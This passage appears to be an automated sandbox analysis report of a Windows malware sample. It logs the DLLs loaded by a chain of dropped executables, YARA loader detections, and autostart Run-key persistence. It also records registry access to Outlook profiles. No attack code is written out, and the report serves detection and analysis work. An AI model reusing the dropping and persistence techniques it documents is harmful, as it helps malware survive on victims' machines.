                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: propsys.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: edputil.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: appresolver.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: slc.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: sppc.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: textinputframework.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: coreuicomponents.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: atiadlxx.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: atiadlxy.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: atiadlxy.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: atiadlxy.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: nvapi64.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: atiadlxy.dll
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\license.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\hosts.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\hosts.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\hosts.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\hosts.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\hosts.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\hosts.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\hosts.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\hosts.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\hosts.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\hosts.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\hosts.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\hosts.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\hosts.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\hosts.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\hosts.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\a.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\WinFormProject-master\obj\Debug\Aml.pdb source: SecuriteInfo.com.FileRepMalware.23820.12149.exe, 00000000.00000000.1141870986.0000000000F52000.00000002.00000001.01000000.00000003.sdmp, a.exe, 0000000B.00000002.1787672422.00000000035FA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: a.exe, 0000000B.00000002.1830473060.0000000005940000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: chrome_elf.dll.pdb source: chrome.exe, 0000000D.00000000.1383267169.00007FFC9D18F000.00000002.00000001.01000000.0000000B.sdmp
                      Source: Binary string: protobuf-net.pdb source: a.exe, 0000000B.00000002.1830473060.0000000005940000.00000004.08000000.00040000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Yara detected Costura Assembly Loader
                      Source: Yara matchFile source: 11.2.a.exe.5910000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.Gelelx.exe.59f0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.Gelelx.exe.59f0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.license.exe.4435630.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.license.exe.41706c8.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 21.2.license.exe.4435630.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000002.2093956050.00000000059F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.1993362818.00000000033C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1787672422.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.1825728911.0000000005910000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2435942015.0000000004435000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2348269158.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000015.00000002.2435942015.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: a.exe PID: 7908, type: MEMORYSTR
                      Source: SecuriteInfo.com.FileRepMalware.23820.12149.exeStatic PE information: 0xC865B9A0 [Thu Jul 16 07:24:16 2076 UTC]
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeCode function: 0_2_031CEF00 pushfd ; iretd 0_2_031CEF01
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_085A3AD9 push ebx; retf 1_2_085A3ADA
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_03164861 push edi; iretd 11_2_03164866
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05722E78 push AC0130BBh; ret 11_2_05722E8D
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_058FD053 push edi; iretd 11_2_058FD056
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB0719 push es; retf 11_2_05CB0722
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB06AA push es; retf 11_2_05CB06CA
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB8870 push es; iretd 11_2_05CB887E
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB8830 push es; iretd 11_2_05CB883E
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB9588 push ebp; iretd 11_2_05CB9592
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB9E87 push edi; iretd 11_2_05CB9E92
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CB1E73 pushad ; retf 11_2_05CB1E81
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CE354D push ss; retf 11_2_05CE3559
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CE653C push ds; iretd 11_2_05CE653F
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CE68FA pushad ; retf 11_2_05CE68FD
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CE70FA pushad ; ret 11_2_05CE70FD
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_05CE123E push BEFFFFEEh; ret 11_2_05CE1243
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_06190040 push es; retn 1939h11_2_06196460
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_061934FA pushad ; retf 11_2_061934FD
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07318A20 push eax; ret 11_2_07318A21
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_073D0331 push ds; iretd 11_2_073D033F
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_073D68F7 push edi; retf 11_2_073D6906
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07510701 push 8B0442FEh; iretd 11_2_07510706
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07510FF3 push 8B0442FEh; iretd 11_2_07510FF8
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_075105D3 push 8B0442FEh; iretd 11_2_075105D8
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07510AAE push 8B0442FEh; iretd 11_2_07510AB3
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07511123 push 8B0442FEh; iretd 11_2_07511128
                      Source: C:\Users\user\AppData\Roaming\a.exeCode function: 11_2_07510983 push 8B0442FEh; iretd 11_2_07510988
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_03331322 push esp; iretd 16_2_03331329
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_0333132A pushad ; ret 16_2_0333132D
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeCode function: 16_2_03339573 push eax; retf 16_2_0333957D
                      Source: a.exe.0.drStatic PE information: section name: .text entropy: 7.996440956524935
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeFile created: C:\Users\user\AppData\Roaming\hosts.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeFile created: C:\Users\user\AppData\Roaming\license.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\a.exeFile created: C:\Users\user\AppData\Local\Temp\Gelelx.exeJump to dropped file
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeFile created: C:\Users\user\AppData\Roaming\a.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeFile created: C:\Users\user\AppData\Local\Temp\Vhbyv.exeJump to dropped file

                      Boot Survival

                      barindex
                      Creates multiple autostart registry keys
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hosts
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run license
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run license
                      Source: C:\Users\user\AppData\Local\Temp\Gelelx.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run license
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hosts
                      Source: C:\Users\user\AppData\Local\Temp\Vhbyv.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run hosts

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.23820.12149.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
